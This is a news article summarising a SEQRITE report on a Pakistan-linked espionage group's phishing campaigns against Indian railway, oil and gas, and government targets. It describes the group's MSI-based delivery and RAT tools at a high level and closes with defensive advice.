A Pakistan-linked cyber espionage group has significantly broadened its targeting footprint in a new wave of attacks against Indian organizations. According to a report published by cybersecurity firm SEQRITE, this advanced persistent threat (APT) actor, believed to be associated with the SideCopy subgroup of Transparent Tribe (APT36), has shifted tactics and tools in its recent campaigns that began around December 2024.
The threat actor, previously known for targeting Indian defense, diplomatic, and maritime sectors, is now infiltrating critical civil infrastructure. Recent campaigns have reportedly targeted India’s railway network, oil and gas enterprises, and the Ministry of External Affairs. The motive appears to be strategic cyber-espionage — harvesting sensitive data and maintaining long-term access to critical Indian systems.
Shift in Tactics: From HTA to MSI
One of the notable changes in the latest campaign is the replacement of legacy HTML Application (HTA) files with Microsoft Installer (MSI) packages to deliver malware. MSI files are commonly used for legitimate software installations, helping the attackers evade detection by traditional security tools and increase user trust.
These MSI packages are laced with remote access trojans (RATs) that serve as the primary tools for data theft, reconnaissance, and long-term surveillance.
A Trio of Malware Tools
The attackers utilize a variety of sophisticated malware tools, including:
- CurlBack RAT: A newly discovered Windows-based malware capable of command execution, privilege escalation, file exfiltration, and persistence. The malware uses Windows curl to communicate with its command-and-control (C2) server, which enables stealthy data transfers.
- Spark RAT: A powerful cross-platform RAT developed in Node.js. It supports multiple commands, including file manipulation and command execution, and is used to target both Windows and Linux machines.
- Xeno RAT: A customized version of an open-source RAT with additional modules and capabilities tailored for stealth and persistence.
These tools collectively allow the threat group to establish deep footholds within the victim systems while minimizing the risk of detection.
Social Engineering and Delivery Methods
The threat actors continue to rely on social engineering tactics. Victims are lured through phishing emails containing malicious MSI attachments disguised as legitimate documents. Some of the bait themes observed include fake Indian Railways holiday lists and cybersecurity awareness documents impersonating Hindustan Petroleum Corporation Limited (HPCL).
Once executed, the MSI installer uses a multi-stage infection chain involving PowerShell scripts, AES decryption, and DLL side-loading techniques to activate the malware while bypassing endpoint defenses.
Strategic Implications
This new campaign demonstrates an evolution in the group’s operational sophistication and a shift in focus toward critical infrastructure. The timing and expanded targeting suggest that APT36 is aligning its objectives with broader geopolitical interests.
Cybersecurity experts warn that such campaigns could escalate tensions in the region, especially if critical data or operational technology (OT) systems are compromised. Organizations across Indian sectors are urged to monitor for indicators of compromise (IOCs), adopt layered defense strategies, and educate staff about phishing threats.
The SEQRITE report serves as a stark reminder that nation-state-backed cyber operations are no longer limited to defense or diplomatic targets. Civil infrastructure is now firmly in the crosshairs — and the stakes are higher than ever.